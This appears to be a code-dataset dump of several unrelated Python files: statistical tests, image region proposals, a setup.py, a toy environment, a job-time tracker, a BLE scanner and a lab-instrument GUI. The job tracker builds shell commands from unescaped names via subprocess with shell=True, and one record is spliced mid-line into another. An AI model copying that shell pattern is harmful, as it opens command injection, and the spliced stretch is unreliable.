wilcoxon_df.append(w_test, ignore_index=True)\n            values = np.append(values, w)\n            values = np.append(values, p_val)\n\n        index = wilcoxon_df['estimator_1'].unique()\n        values_names = ['statistic', 'p_val']\n        col_idx = pd.MultiIndex.from_product([index, values_names])\n        values_reshaped = values.reshape(len(index), len(values_names) * len(index))\n\n        values_df_multiindex = pd.DataFrame(values_reshaped, index=index, columns=col_idx)\n\n        return wilcoxon_df, values_df_multiindex\n\n    def friedman_test(self, strategy_dict):\n        \"\"\"\n        The Friedman test is a non-parametric statistical test used to detect differences \n        in treatments across multiple test attempts. The procedure involves ranking each row (or block) together, \n        then considering the values of ranks by columns.\n        Implementation used: `scipy.stats `_. 
\n        \n        Parameters\n        ----------\n        strategy_dict : dict\n            Dictionary with errors on test sets achieved by estimators.\n        Returns\n        -------\n        tuple \n            dictionary, pandas DataFrame.\n        \n        \"\"\"\n\n        \"\"\"\n        use the * operator to unpack a sequence\n        https://stackoverflow.com/questions/2921847/what-does-the-star-operator-mean/2921893#2921893\n        \"\"\"\n        friedman_test = stats.friedmanchisquare(*[strategy_dict[k] for k in strategy_dict.keys()])\n        values = [friedman_test[0], friedman_test[1]]\n        values_df = pd.DataFrame([values], columns=['statistic', 'p_value'])\n\n        return friedman_test, values_df\n\n    def nemenyi(self, strategy_dict):\n        \"\"\"\n        Post-hoc test run if the `friedman_test` reveals statistical significance.\n        For more information see `Nemenyi test `_.\n        Implementation used `scikit-posthocs `_.\n        \n        Parameters\n        ----------\n        strategy_dict : dict\n            Dictionary with errors on test sets achieved by estimators.\n        Returns\n        -------\n        pandas DataFrame\n            Results of te Nemenyi test\n        \"\"\"\n\n        strategy_dict = pd.DataFrame(strategy_dict)\n        strategy_dict = strategy_dict.melt(var_name='groups', value_name='values')\n        nemenyi = sp.posthoc_nemenyi(strategy_dict, val_col='values', group_col='groups')\n        return nemenyi\n","sub_path":"sktime/experiments/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":13537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"493466805","text":"import cv2\nimport os\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport config\nimport numpy as np\nimport utils\nfrom skimage.transform import resize\n\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '1'\n\ndef SelectiveSearch(img, crop=False, resizing=False, saveFiles=False, maxSave=2000, min_s=500, big_regions=40000):\n    im = plt.imread(img)\n\n    if crop:\n        newHeight = min(1500, im.shape[0])\n        newWidth = min(1500, im.shape[1])\n\n        im = im[0:newHeight, 0:newWidth]\n\n    elif resizing:\n        if im.shape[0]>1000 or im.shape[1]>1000:\n            if im.shape[0] >= im.shape[1]:\n                newHeight = 1000\n                newWidth = int(im.shape[1] * 1000 / im.shape[0])\n            else:\n                newWidth = 1000\n                newHeight = int(im.shape[0] * 1000 / im.shape[1])\n\n            im = resize(im, (newHeight, newWidth), anti_aliasing=True)\n            im = im.astype(\"float32\")\n\n    # create Selective Search Segmentation Object using default parameters\n    ss = cv2.ximgproc.segmentation.createSelectiveSearchSegmentation()\n\n    # create Graph Segmentation to be able to define parameters\n    gs = cv2.ximgproc.segmentation.createGraphSegmentation(sigma=0.8, k=1, min_size=min_s)\n\n    # set input image on which we will run segmentation\n    ss.setBaseImage(im)\n\n    ss.switchToSelectiveSearchFast()\n    # ss.switchToSelectiveSearchQuality()\n\n    # add Graph Segmentation to Search Segmentation\n    ss.addGraphSegmentation(gs)\n\n    # run selective search segmentation on input image\n    rects = ss.process()\n    print('Total Number of Region Proposals: {}'.format(len(rects)))\n\n    print(\"Deleting big regions...\")\n    rects = rects[np.where(rects[:, 2]*rects[:, 3] < big_regions)]\n    print(\"Regions after deleting: {}\".format(len(rects)))\n\n    rects = utils.bbox_to_max(rects)\n\n    if saveFiles:\n        print(\"Saving regions...\")\n        # iterate over all the region proposals\n        for i, rect in enumerate(rects):\n            # draw rectangle for region proposal till numShowRects\n            if i < maxSave:\n                x, y, w, h = rect\n                output_file = os.path.join(config.OUTPUT_REGIONS, os.path.splitext(os.path.basename(img))[0] + \"_\" + str(i) + \".png\")\n                plt.imsave(output_file, tf.image.crop_to_bounding_box(im, y, x, h, w))\n            else:\n                break\n\n    return im, rects[:2000]\n","sub_path":"code/selective_search.py","file_name":"selective_search.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"454849611","text":"import sys\nfrom distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Distutils import build_ext\n\nEXTRA_COMPILE_ARGS=[]\nif sys.platform == 'darwin':              # Mac OS X?\n    EXTRA_COMPILE_ARGS.extend(['-arch', 'x86_64', '-mmacosx-version-min=10.7',\n                               '-std=c++11', '-stdlib=libc++'])\n \n\nsetup(\n   name='bbhash',\n   version='0.1dev2',\n   description=\"A Python wrapper for the BBHash Minimal Perfect Hash Function\",\n   author=\"C. Titus Brown\",\n   author_email=\"titus@idyll.org\",\n   license=\"BSD 3-clause\",\n   url=\"http://github.com/dib-lab/pybbhash\",\n   ext_modules =\n          [Extension('bbhash',\n                     sources=['bbhash.pyx'],\n                     depends=['BooPHF.h'],\n                     language='c++',\n                     extra_compile_args=EXTRA_COMPILE_ARGS)],\n   headers=['BooPHF.h'],\n   cmdclass = {'build_ext': build_ext}\n)\n","sub_path":"pypi_install_script/bbhash-0.1dev2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"296407392","text":"from __future__ import division, unicode_literals, print_function\nimport math\n\nimport numpy as np\n\nfrom regions import NDArrayDataset\n\n\nclass ToyEnvironment:\n    def __init__(self, size, step_size, n_sample_actions=20,\n                 boundary_strategy='walled', distance_measurement='dist',\n                 cutoff_factor=5, static=True, blind=False):\n        self.size = size\n        self.step_size = step_size\n        self.n_sample_actions = n_sample_actions\n        self.cutoff_factor = cutoff_factor\n        self.static = static\n        self.blind = blind\n        self._observer = None\n        strategies = {'toroid': self._toroidize, 'walled': self._wall_in}\n        if boundary_strategy not in strategies:\n            raise Exception('Illegal boundary strategy')\n        self._boundary_strategy = strategies[boundary_strategy]\n        if distance_measurement not in {'dist', 'exp'}:\n            raise Exception('Illegal distance measurement')\n        self.distance_measurement = distance_measurement\n        self.r = np.random.rand(2) * self.size - self.half_size\n        # self.b = np.random.rand(2) * self.size - self.half_size\n        self.b = np.array([0, 0], dtype=float)\n\n    def start_observation(self, n_iters):\n        self._observer = NDArrayDataset(n_iters, 6)\n\n    def _toroidize(self, v):\n        hs = self.half_size\n        v[0] = (v[0] + hs) % self.size - hs\n        v[1] = (v[1] + hs) % self.size - hs\n        # Did I get it right? :)\n        assert -hs <= v[0] <= hs\n        assert -hs <= v[1] <= hs\n\n    def _wall_in(self, v):\n        hs = self.half_size\n        if v[0] > hs:\n            v[0] = hs\n        elif v[0] < -hs:\n            v[0] = -hs\n        if v[1] > hs:\n            v[1] = hs\n        elif v[1] < -hs:\n            v[1] = -hs\n\n    def act(self, m):\n        mov, freq = m[:2], m[2]\n        if not self.static:\n            if freq > 0.66:  # [0.66, 1] -> predictable\n                self.b = np.copy(self.r)\n            elif freq < 0.33:  # [0, 0.33] -> not predictable\n                random_b_shape = np.random.random(self.b.shape)\n                self.b += self._movement_modifier(random_b_shape)\n                self._boundary_strategy(self.b)\n            else:  # [0.33, 0.66] -> predictable\n                pass\n\n        self.r += mov\n        self._boundary_strategy(self.r)\n        if self._observer is not None:\n            self._observer.update(np.concatenate((self.r, self._signal(), m)))\n\n    def sense(self):\n        if self.blind:\n            return self._signal()\n        return np.concatenate((self.r, self._signal()))\n\n    def _signal(self):\n        distance = np.linalg.norm(self.r - self.b)\n        if self.distance_measurement == 'dist':\n            return np.array([distance])\n        return np.array([math.exp(-self.cutoff_factor * distance)])\n\n    @property\n    def s_len(self):\n        if self.blind:\n            return 1  # [signal]\n        return 3  # [x, y, signal]\n\n    @property\n    def m_len(self):\n        return 3  # [dx, dy, freq]\n\n    @property\n    def all_actions(self):\n        return self._gen_actions\n\n    @property\n    def half_size(self):\n        return self.size / 2\n\n    @property\n    def observer(self):\n        if self._observer is None:\n            raise Exception('No observer set.')\n        return self._observer\n\n    def _gen_actions(self):\n        actions = np.random.rand(self.n_sample_actions, self.m_len)\n        actions[:, :2] = 
self._movement_modifier(actions[:, :2])\n        return actions\n\n    def _movement_modifier(self, m):\n        return m * (2 * self.step_size) - self.step_size","sub_path":"iac/environments.py","file_name":"environments.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"195796551","text":"# -*- encoding: utf-8 -*-\n\nimport unittest\n\nclass TestSomething(unittest.TestCase):\n    def test_unicode(self):\n        self.assertEqual(u'Русский', u'Текст')\n\nif __name__ == '__main__':\n    import sys\n    reload(sys)\n    sys.setdefaultencoding('utf8')\n    unittest.main()\n","sub_path":"all-gists/3976411/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"349322042","text":"\"\"\"Module that provides classes to handle the application.\"\"\"\nfrom datetime import datetime\nimport subprocess\nfrom re import search\nfrom backend import jobs, results as rs, filesys as fs\nimport basic\n\nclass AdminData():\n    \"\"\"Handle administrative and configuration data.\"\"\"\n\n    def __init__(self):\n        \"\"\"Constructor.\"\"\"\n        self.selected_job_name = None\n\n    def from_json(self, d):\n        \"\"\"Load admin data from a dict (loaded from json).\"\"\"\n        if not d is None:\n            self.__dict__ = d\n\n    def get_keys(self):\n        \"\"\"Return the attributes that will be saved to json.\"\"\"\n        return [\"selected_job_name\"]\n\n    def select_job(self, name):\n        # REFACTOR: use property\n        self.selected_job_name = name\n\n    def get_selected_job(self):\n        return self.selected_job_name\n\n    def update(self):\n        \"\"\"Update function.\"\"\"\n\n        ### ADD YOUR UPDATES HERE ###\n\nclass Application():\n    \"\"\"Handle the application.\"\"\"\n\n    def __init__(self, root_path, notify=False):\n        \"\"\"Constructor.\"\"\"\n        self.fh = fs.JobFileHandler(root_path, \"files\") # HACK: \"files\" hardcoded\n        self._mark_time()\n        self.admin_fh = fs.AdminFileHandler(root_path, \"config\", \"admin\") # \"config\" and \"admin\" hardcoded\n        self.admin_data = AdminData()\n        self.admin_data.from_json(self.admin_fh.load_admin())\n\n        self.notify = notify\n\n    def close(self):\n        \"\"\"Close the application.\"\"\"\n        self.admin_fh.save_admin(self.admin_data)\n\n    def _choose_name(self, name):\n        \"\"\"If name is None, return the selected name in the admin data.\"\"\"\n        return name or self.admin_data.get_selected_job()\n\n    def _load_job(self, name):\n        \"\"\"Load a job given a name.\"\"\"\n        job = jobs.Job()\n        json_dict = self.fh.load_job(name)\n        job.from_json(json_dict)\n\n        return job\n\n    def _save_job(self, j):\n        \"\"\"Given a job, dump it to a json file.\"\"\"\n\n        # Make sure it can be dump\n        if not j.can_dump():\n            basic.perror(\"Job can't be saved to json\")\n\n        # Get name\n        name = j.get_name()\n\n        # Assure folder\n        self.fh.save_job(j, name)\n\n    def _get_job_names(self):\n        \"\"\"Get all the existing job names.\"\"\"\n        return self.fh.list_jobs()\n\n    def _exist_job(self, name, archive=False):\n        \"\"\"Bool indicating if job exists\"\"\"\n        return self.fh.exist_job(name, archive=archive)\n\n    def _assert_time(self, action=\"action\"):\n        \"\"\"Assert the time variable set.\"\"\"\n        if self.t is None:\n            basic.perror(\"Can't {} without a timestamp\".format(action))\n\n    def _mark_time(self):\n        \"\"\"Saves the current time.\"\"\"\n        self.t = datetime.now()\n\n    def _notify_action(self, jobname=None, action=None, more_title=None):\n        \"\"\"Notify an action to the screen.\"\"\"\n        if self.notify:\n            title = \"Worktime\"\n            if not more_title is None:\n                title += \" - {}\".format(more_title)\n            message = jobname or \"\"\n            message += \" \"\n            message += action or \"\"\n            subprocess.run(\"notify-send --urgency=critical '{}' '{}'\".format(title, message), shell=True)\n            # NOTE: use return_value.returncode of run() to see the status of the called command\n\n    
def _select_job_GUI(self):\n        \"\"\"Prompt the user to select a job using zenity.\"\"\"\n        column_title = 'Jobs' # TASK: move to config parameters\n        message = 'Select a Job'\n        jobs = ' '.join(self._get_job_names())\n        height = 300 # TODO: change this according to the amount of jobs # height=300 works fine for up to 8 or 9 jobs\n        command = \"zenity --column='{}' --title='{}' --list {} --height={}\".format(column_title, message, jobs, height)\n        result = subprocess.run(command, shell=True, stdout=subprocess.PIPE)\n        selected = result.stdout.decode('utf-8').strip()\n        return selected or None\n\n    \"\"\"API methods\"\"\"\n    def start_job(self, name, info):\n        \"\"\"Option to start a job.\"\"\"\n        self._assert_time(\"start a job\")\n\n        # REFACTOR: this is copied in start/stop/pause methods, use decorators\n        name = self._choose_name(name)\n        if name is None:\n            return rs.StartResult(rs.ResultType.NotSelected)\n\n        if not self._exist_job(name):\n            return rs.StartResult(rs.ResultType.NotExist, jobname=name)\n\n        job = self._load_job(name)\n        result = job.start(self.t, info)\n        if result.is_ok():\n            self._save_job(job)\n\n        if name != self.admin_data.get_selected_job():\n            # Not selected, select it\n            self.select_job(name)\n\n        return result\n\n    def stop_job(self, name, confirmation, info=None, discard=False, force_seconds=None):\n        \"\"\"Option to stop a job.\n\n        confirmation -- function to call if confirmation for discarding an entry is needed\"\"\"\n\n        self._assert_time(\"stop a job\")\n\n        name = self._choose_name(name)\n        if name is None:\n            return rs.StopResult(rs.ResultType.NotSelected)\n\n        if not self._exist_job(name):\n            return rs.StopResult(rs.ResultType.NotExist, jobname=name)\n\n        j = self._load_job(name)\n\n        # Confirmation\n        if j.confirm_discard(): # Confirmation needed\n            if not confirmation(): # Ask for confirmation\n                discard = False\n\n        result = j.stop(self.t, discard=discard, obs=info, force_seconds=force_seconds)\n\n        if result.is_ok():\n            self._save_job(j)\n\n        return result\n\n    def pause_job(self, name):\n        \"\"\"Option to pause a job.\"\"\"\n        self._assert_time(\"pause a job\")\n\n        name = self._choose_name(name)\n        if name is None:\n            return rs.PauseResult(rs.ResultType.NotSelected)\n\n        j = self._load_job(name)\n        result = j.pause(self.t)\n        if result.is_ok():\n            self._save_job(j)\n\n        return result\n\n    def create_job(self, name, confirmation, lname=None, info=None, tags=None):\n        \"\"\"Option to create a job.\"\"\"\n        if self._exist_job(name):\n            if not confirmation():\n                return rs.Result(rs.ResultType.Cancelled)\n\n        j = jobs.Job()\n        result = j.create(name, lname, info, tags)\n\n        if result.is_ok():\n            self._save_job(j)\n\n        return result\n\n    def edit_job(self, name, new_name=None, new_lname=None, new_info=None, info_mode=None, new_tags=None, tags_mode=None):\n        \"\"\"Option to edit a job.\"\"\"\n\n        basic.perror(\"DEPRECATED: can't edit job\")\n\n        j = self._load_job(name)\n\n        # Cambiar nombre\n        if not new_name is None:\n            # j.change_name(new_name)\n            pass # TODO\n\n  
      if not new_lname is None:\n            j.change_longname(new_lname)\n\n        if not new_info is None:\n            j.edit_info(new_info, info_mode)\n\n        if not new_tags is None:\n            j.edit_tags(new_tags, tags_mode)\n\n        self._save_job(j)\n\n    def delete_job(self, name, confirmation, force=False):\n        \"\"\"Option to delete a job.\"\"\"\n\n        if not self._exist_job(name):\n            return rs.DeleteResult(rs.ResultType.NotExist)\n\n        deleted = False\n        if force or confirmation():\n            j = self._load_job(name)\n            self.fh.remove_job(name)\n            deleted = True\n\n        return rs.DeleteResult(was_deleted=deleted)\n\n    def select_job(self, name):\n        \"\"\"Select a job to use later without calling the name.\"\"\"\n        if name is None:\n            return rs.Result(rs.ResultType.NoneNotAccepted)\n        elif self._exist_job(name):\n            self.admin_data.select_job(name)\n            return rs.Result()\n        else:\n            return rs.Result(rs.ResultType.NotExist)\n\n    def unselect_job(self):\n        \"\"\"Unselect a job.\"\"\"\n        prev_jobname = self.admin_data.get_selected_job()\n        if not prev_jobname is None:\n            self.admin_data.select_job(None)\n            return rs.UnselectResult(jobname=prev_jobname)\n        else:\n            return rs.UnselectResult(status=rs.ResultType.NotSelected)\n\n    def show_jobs(self, name, run_only=False):\n        \"\"\"Option to show jobs.\"\"\"\n\n        def match_regex(k, m):\n            \"\"\"Boolean matching k with m, using regex.\"\"\"\n            return not search(m, k) is None\n\n        def is_running(j):\n            \"\"\"Boolean, job is running.\"\"\"\n            return j.is_running\n\n        def dont_match(dummy1=None, dummy2=None):\n            \"\"\"Return true always, i.e don't match.\"\"\"\n            return True\n\n        names = self._get_job_names()\n\n        # Functions to filter\n        match = dont_match if name is None else match_regex\n        filter_running = dont_match if not run_only else is_running\n\n        results = rs.ShowResult()\n        for n in names:\n            j = self._load_job(n)\n            if match(n, name) and filter_running(j):\n                result = j.show(self.t)\n                results.add_job(result)\n\n        return results\n\n    def backup_jobs(self):\n        \"\"\"Backup existing jobs.\"\"\"\n        for name in self._get_job_names():\n            self.fh.backup_job(name)\n\n        return rs.Result()\n\n    def archive_job(self, name, unarchive=False):\n        \"\"\"Archive a job.\"\"\"\n        if not self._exist_job(name, archive=unarchive):\n            # NOTE:\n            # unarchive == False --> archiving, need to check non-archive folder\n            # unarchive == True --> unarchiving, need to check archive folder\n            # HACK: there is no ArchiveResult type, so use StartResult\n            return rs.StartResult(rs.ResultType.NotExist, jobname=name)\n\n        if unarchive:\n            self.fh.unarchive_job(name)\n        else:\n            self.fh.archive_job(name)\n\n        return rs.Result() # everything ok\n\n    def update_jobs(self):\n        \"\"\"Make an update to the Job objects.\"\"\"\n        self.admin_data.update()\n\n        for name in self._get_job_names():\n            j = self._load_job(name)\n            j.update()\n            self._save_job(j)\n\n        return rs.Result()\n\n    def display_help(self, shortcut=True):\n       
 \"\"\"Display a help message.\"\"\"\n        if not shortcut:\n            print(\"Nothing here\")\n            return\n\n        # HACK: do this from configuration file\n        special_cmd = 'Shift+Alt'\n        commands = [\n            ['Up', 'Start the selected job'],\n            ['Down', 'Stop the selected job'],\n            ['P', 'Pause the selected job'],\n            ['S', 'Show the status of the running jobs'],\n            ['W', 'Select a job interactively'],\n            ['U', 'Unselect the currently selected job'],\n            ['A', 'Show the currently selected job'],\n            ['H', 'Display this help message'],\n            ]\n\n        full_message = \"{} +:\\n\".format(special_cmd)\n        for i in range(len(commands)):\n            key = commands[i][0]\n            help_msg = commands[i][1]\n            full_message += \"\\t{} -- {}\\n\".format(key, help_msg)\n\n        # HACK: use _print_action()\n        # HACK: this should be in console application!!!\n        print(full_message)\n\n        subprocess.run(\"zenity --info --height=200 --text='{}'\".format(full_message), shell=True, stdout=subprocess.PIPE)\n","sub_path":"backend/application/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":11172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"372773710","text":"from __future__ import print_function\n\nimport datetime\nimport time\nimport struct\nfrom bluepy import btle\n\n# Looks for badges and return their state (synced or not), the \n# date of the latest scan, and a list of RSSIs\nclass BadgeDiscoverer:\n\tdef __init__(self):\n\t\tself.DEVICE_NAME = \"BADGE\"\n\t\tself.CLOCK_STATE_SYNC = \"CLKSYN\"\n\t\tself.CLOCK_STATE_UNSYNC = \"CLKUN\"\n\t\tself.DEVICE_NAME_FIELD_ID = 9\n\t\n\tdef discover(self, scanDuration = 1): #seconds\n\t\tbtle.Debugging = False\n\t\tscanner = btle.Scanner().withDelegate(ScanDummy())\n\t\traw_devices = scanner.scan(scanDuration)\n\t\t\n\t\tdevices={}\n\t\tfor device in raw_devices:\n\t\t\tdevice_name = None\n\t\t\tfor (sdid, desc, val) in device.getScanData():\n\t\t\t\tif sdid  == self.DEVICE_NAME_FIELD_ID: device_name = val\n\n\t\t\tif device_name == self.DEVICE_NAME:\n\t\t\t\trssi = device.rssi\n\t\t\t\tmac = device.addr.upper()\n\t\t\t\tvoltage = self.unpackBroadcastData(device.rawData)\n\t\t\t\tis_sync = not(self.CLOCK_STATE_UNSYNC in device.rawData)\n\t\t\t\tscan_date = datetime.datetime.now()\n\t\t\t\tif not (mac in devices):\n\t\t\t\t\tdevices[mac] = {'scan_date':scan_date,'is_sync':is_sync,'rssi':rssi,'voltage':voltage}\n\t\t\t\telse:\n\t\t\t\t\tdevices[mac]['rssi']=rssi\n\t\t\t\t\tdevices[mac]['scan_date'] = scan_date\n\n\t\treturn devices\n\n\t# Extract badge specific data from the broadcasting message\n\tdef unpackBroadcastData(self, data):\n\t\tif len(data) >= 26:\n\t\t\tbadgeDataBuffer = data[18:26]\n\t\t\tbadgeInfoArr = struct.unpack(' in a separate process\n#class ManagerShamrockSpectrometer(BaseManager): pass\n#ManagerShamrockSpectrometer.register('ShamrockSpectrometer', ShamrockSpectrometer)\n\n########################################################################\n\nclass SettingsNotebook (wx.Notebook) :\n\t\"\"\"\n\tGUI for listing all settings\n\t\"\"\"\n\tdef __init__(self, parent):\n\t\twx.Notebook.__init__(self, parent)\n\t\t \n\t\tself.Spectrometer = ShamrockSpectrometerTab(self)\n\t\tself.AddPage (self.Spectrometer, \"Spectra settings\")\n\t\t \n\t\tself.PulseShaper = PulseShaperTab(self)\n\t\tself.AddPage (self.PulseShaper, \"Pulse shaper settings\")\n\n\t\tself.RectangularScan = RectangularScanTab(self)\n\t\tself.AddPage (self.RectangularScan, \"Rectangular scan\")\n\t\t \n\t\t# Dictionary to bind names to tabs for saving and loading settings\n\t\tself.settings_to_tabs = {\"Spectrometer\" : self.Spectrometer, \"PulseShaper\" : self.PulseShaper,\n\t\t\t\"RectangularScan\" : self.RectangularScan }\n\t\t \n########################################################################\n\nclass SurfaceControlExperiment (wx.Frame) :\n\t\"\"\"\n\tApplication for running experiments\n\t\"\"\"\n\tdef __init__ (self, parent) :\n\t\t# Starting spectrometer\n\t\tself.Spectrometer = ManagerShamrockSpectrometer()\n\t\tself.SpectrometerProc = self.Spectrometer.start()\n\t\t\n\t\t# Starting pulse shaper\n\t\tself.PulseShaper = ManagerShaper()\n\t\tself.PulseShaperProc = self.PulseShaper.start()\n\t\t\n\t\t# Starting moving stages (by specifying their serial numbers)\n\t\tself.MovingStageX = ManagerThorlabsAPTMovingStage(83843642)\n\t\tself.MovingStageXProc = self.MovingStageX.start()\n\t\t\t\t\n\t\tself.MovingStageY = ManagerThorlabsAPTMovingStage(83843641)\n\t\tself.MovingStageYProc = self.MovingStageY.start()\n\n\t\t# Create GUI\n\t\tdw, dh = wx.DisplaySize()\n\t\twx.Frame.__init__ (self, parent, title=\"Surface control experiment\", size=(0.9*dw, 0.88*dh) 
)\n\t\t\n\t\tself.ConstructGUI ()\n\t\tself.Center()\n\t\tself.Show ()\n\t\twx.EVT_CLOSE (self, self.on_close)\n\t\n\tdef on_close (self, event):\n\t\t\"\"\"\n\t\tWindows is about to be closed. Stop all timers.\n\t\t\"\"\"\n\t\tself.StopAllJobs ()\n\t\tself.Destroy ()\t\n\t\n\tdef ConstructGUI (self) :\n\t\t\"\"\" Build GUI \"\"\"\n\t\tself.panel = wx.Panel(self)\n\t\tsizer = wx.GridBagSizer ()\n\t\t\n\t\t############################ Settings Notebook ############################\n\t\tself.SettingsNotebook = SettingsNotebook(self.panel)\n\t\tsizer.Add(self.SettingsNotebook, pos=(0, 0), span=(1, 1), flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=10)\n\n\t\t############################ Command panel ############################\n\t\tboxsizer = wx.BoxSizer (wx.VERTICAL)\n\t\t\n\t\t# Test button\n\t\ttest_button = wx.Button (self.panel, label=\"Test\") \n\t\t\n\t\tdef OnTestButton (event) :\n\t\t\tself.PulseShaper.Initialize( self.SettingsNotebook.PulseShaper.GetSettings() )\n\t\t\tself.PulseShaper.Test()\n\t\t\t\n\t\tself.Bind (wx.EVT_BUTTON, OnTestButton, test_button)\n\t\tboxsizer.Add (test_button, flag=wx.EXPAND|wx.TOP, border=5)\n\t\t\n\t\t# Interactively display spectrum\n\t\tself.show_spectrum_button = wx.Button (self.panel)\n\t\tself.show_spectrum_button.__start_label__ = \"Show spectrum\"\n\t\tself.show_spectrum_button.__stop_label__ = \"STOP measuring spectrum\"\n\t\tself.show_spectrum_button.SetLabel (self.show_spectrum_button.__start_label__)\n\t\tself.Bind (wx.EVT_BUTTON, self.MeasureSingleSpectrum, self.show_spectrum_button)\n\t\t#self.show_spectrum_button.Bind(wx.EVT_BUTTON, self.MeasureSingleSpectrum)\n\t\tboxsizer.Add (self.show_spectrum_button, flag=wx.EXPAND, border=5)\n\t\t\n\t\t################## Rectangular scan button ##################\n\t\tself.rectangular_scan_button = wx.Button (self.panel)\n\t\tself.rectangular_scan_button.Bind (wx.EVT_LEFT_DOWN, self.PerformMeasurments)\n\t\tself.rectangular_scan_button.Bind (wx.EVT_LEFT_DCLICK, self.PerformMeasurments)\n\t\tboxsizer.Add(self.rectangular_scan_button, flag=wx.EXPAND, border=5)\n\t\t# Define labels\n\t\tself.rectangular_scan_button.__start_label__ \t= \"Rectangular scan\"\n\t\tself.rectangular_scan_button.__pause_label__ \t= \"PAUSE scan\"\n\t\tself.rectangular_scan_button.__resume_label__\t= \"RESUME scan\"\n\t\tself.rectangular_scan_button.__stop_label__ \t= \"STOP scan\"\n\t\tself.rectangular_scan_button.SetLabel (self.rectangular_scan_button.__start_label__)\n\t\t# Specify the measurements settings\n\t\tself.rectangular_scan_button.__measurmenet_manager__ \t\t= ManagerRectangularScan\n\t\tself.rectangular_scan_button.__measurmenet_manager_args__\t= (self.Spectrometer, self.MovingStageX, self.MovingStageY)\n\t\tself.rectangular_scan_button.__tab_settings__\t\t\t\t= \"RectangularScan\"\n\t\t#self.rectangular_scan_button.__post_process__ = self.RectangularScanPostProcess \n\t\t\n\t\t# Save settings\n\t\tself.save_settings_button = wx.Button (self.panel, label=\"Save settings...\")\n\t\tself.Bind (wx.EVT_BUTTON, self.SaveSettings, self.save_settings_button)\n\t\tboxsizer.Add(self.save_settings_button, flag=wx.EXPAND|wx.TOP, border=5)\n\t\t\n\t\t# Load settings\n\t\tself.load_settings_button = wx.Button (self.panel, label=\"Load settings...\")\n\t\tself.Bind (wx.EVT_BUTTON, self.LoadSettings, self.load_settings_button)\n\t\tboxsizer.Add(self.load_settings_button, flag=wx.EXPAND|wx.TOP, border=5)\n\t\t\n\t\tsizer.Add(boxsizer, pos=(1, 0), span=(1, 1), flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , 
border=10)\n\t\t########################### End of constructing panel ######################################\n\t\tself.panel.SetSizer (sizer)\n\t\t\n\t\t############################# Setting visvis #######################################\n\t\tFigure = app.GetFigureClass()\n\t\tself.fig = Figure(self)\n\t\t\n\t\tboxsizer = wx.BoxSizer (wx.HORIZONTAL)\n\t\tboxsizer.Add(self.panel, 1, wx.EXPAND)\n\t\tboxsizer.Add(self.fig._widget, 2, wx.EXPAND)\n\n\t\tself.SetSizer (boxsizer)\n\t\tself.SetAutoLayout(True)\n\t\tself.Layout() \t\n\t\t\n\tdef __del__ (self) :\t\n\t\t# Close moving stages\n\t\tself.MovingStageX.exit(); self.MovingStageXProc.join()\n\t\tself.MovingStageY.exit(); self.MovingStageYProc.join()\n\t\t\n\t\t# Close spectrometer\n\t\tself.Spectrometer.exit(); self.SpectrometerProc.join() \n\t\t\n\t\t# Close pulse shaper\n\t\tself.PulseShaper.exit(); self.PulseShaperProc.join()\n\t\t\n\tdef PerformMeasurments (self, event) :\n\t\t\"\"\"\n\t\tA universal wrapper for performing measurements\n\t\t\"\"\"\n\t\t# Extracting which button was clicked\n\t\ttry :\n\t\t\tbutton = event.GetEventObject()\n\t\t\t# Mouse double clicking stops scanning\n\t\t\tif event.GetEventType() == wx.wxEVT_LEFT_DCLICK  : button.SetLabel (button.__stop_label__)\n\t\texcept AttributeError : button = event\n\n\t\tif button.GetLabel() == button.__start_label__ :\n\t\t\tself.StopAllJobs ()\n\t\t\t\n\t\t\t# get spectrometer's settings\n\t\t\tsettings = self.SettingsNotebook.Spectrometer.GetSettings()\n\t\t\t# Initiate spectrometer\n\t\t\tif self.Spectrometer.SetSettings(settings) == RETURN_FAIL : return\n\t\t\t\n\t\t\t# Extract the measurements settings \n\t\t\ttab = self.SettingsNotebook.settings_to_tabs[button.__tab_settings__]\n\t\t\tsettings = tab.GetSettings()\n\t\t\tif \"filename\" not in settings : settings[\"filename\"] = \"results.hdf5\"\n\t\t\t\n\t\t\t# Save the global settings\n\t\t\tresult = self.SaveSettings( default_filename=settings[\"filename\"], title=button.__start_label__)\n\t\t\tif not isinstance(result, basestring) : \n\t\t\t\t# User did not chose the file name\n\t\t\t\treturn\n\t\t\t\n\t\t\tif settings[\"filename\"] != result :\n\t\t\t\t# Update the file name if user chosen different\n\t\t\t\tsettings[\"filename\"] = result\n\t\t\t\ttab.SetSettings (settings)\n\t\t\t\n\t\t\t# Saving the filename for postprocesing \n\t\t\tbutton.__results_filename__ = result\n\t\t\t\n\t\t\t# Start scanning via the corresponding manager\n\t\t\tbutton.__running_manager__ = button.__measurmenet_manager__(settings, *button.__measurmenet_manager_args__)\n\t\t\t\n\t\t\t# Start timer to monitor weather measurement is over\n\t\t\tTIMER_ID = wx.NewId()\n\t\t\tbutton.__scanning_timer__ = wx.Timer (self, TIMER_ID)\n\t\t\tbutton.__scanning_timer__.Start (2000) # check every 2 seconds\n\t\t\t\n\t\t\tdef check_weather_scanning_finished (event) : \n\t\t\t\tif not button.__running_manager__.is_running () : \n\t\t\t\t\tbutton.SetLabel (button.__stop_label__); self.PerformMeasurments (button)\n\t\t\t\n\t\t\twx.EVT_TIMER (self, TIMER_ID, check_weather_scanning_finished)\n\t\t\t\n\t\t\t# Changing the button's label \n\t\t\tbutton.SetLabel 